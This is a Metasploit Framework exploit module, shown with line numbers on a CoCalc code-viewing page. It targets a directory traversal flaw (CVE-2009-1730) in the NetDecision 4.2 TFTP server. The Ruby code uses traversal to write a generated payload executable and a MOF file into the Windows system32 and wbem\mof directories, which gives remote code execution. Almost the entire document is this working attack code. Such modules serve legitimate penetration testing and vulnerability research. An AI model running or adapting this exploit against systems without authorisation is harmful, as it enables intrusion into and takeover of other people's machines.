Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
class MetasploitModule < Msf::Exploit::Remote
6
Rank = ExcellentRanking
7
8
include Rex::Proto::TFTP
9
include Msf::Exploit::EXE
10
include Msf::Exploit::WbemExec
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
17
'Description' => %q{
18
This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The
19
software contains a directory traversal vulnerability that allows a remote attacker
20
to write arbitrary file to the file system, which results in code execution under
21
the context of user executing the TFTP Server.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [
25
'Rob Kraus', # Vulnerability discovery
26
'juan vazquez' # Metasploit module
27
],
28
'References' => [
29
['CVE', '2009-1730'],
30
['OSVDB', '54607'],
31
['BID', '35002']
32
],
33
'Payload' => {
34
'BadChars' => "\x00",
35
},
36
'DefaultOptions' => {
37
'EXITFUNC' => 'thread'
38
},
39
'Platform' => 'win',
40
'Targets' => [
41
['NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2', {}]
42
],
43
'Privileged' => false,
44
'DisclosureDate' => '2009-05-16',
45
'DefaultTarget' => 0,
46
'Notes' => {
47
'Reliability' => UNKNOWN_RELIABILITY,
48
'Stability' => UNKNOWN_STABILITY,
49
'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
}
51
)
52
)
53
54
register_options([
55
OptInt.new('DEPTH', [false, "Levels to reach base directory", 1]),
56
OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
57
OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
58
])
59
end
60
61
def upload(filename, data)
62
tftp_client = Rex::Proto::TFTP::Client.new(
63
"LocalHost" => "0.0.0.0",
64
"LocalPort" => 1025 + rand(0xffff - 1025),
65
"PeerHost" => datastore['RHOST'],
66
"PeerPort" => datastore['RPORT'],
67
"LocalFile" => "DATA:#{data}",
68
"RemoteFile" => filename,
69
"Mode" => "octet",
70
"Context" => { 'Msf' => self.framework, "MsfExploit" => self },
71
"Action" => :upload
72
)
73
74
ret = tftp_client.send_write_request { |msg| print_status(msg) }
75
while not tftp_client.complete
76
select(nil, nil, nil, 1)
77
tftp_client.stop
78
end
79
end
80
81
def exploit
82
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
83
84
# Setup the necessary files to do the wbemexec trick
85
exe_name = rand_text_alpha(rand(10) + 5) + '.exe'
86
exe = generate_payload_exe
87
mof_name = rand_text_alpha(rand(10) + 5) + '.mof'
88
mof = generate_mof(mof_name, exe_name)
89
90
# Configure how deep we want to traverse
91
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
92
levels = "../" * depth
93
94
# Upload the malicious executable to C:\Windows\System32\
95
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
96
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
97
98
# Let the TFTP server idle a bit before sending another file
99
select(nil, nil, nil, 1)
100
101
# Upload the mof file
102
print_status("#{peer} - Uploading .mof...")
103
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
104
end
105
end
106
107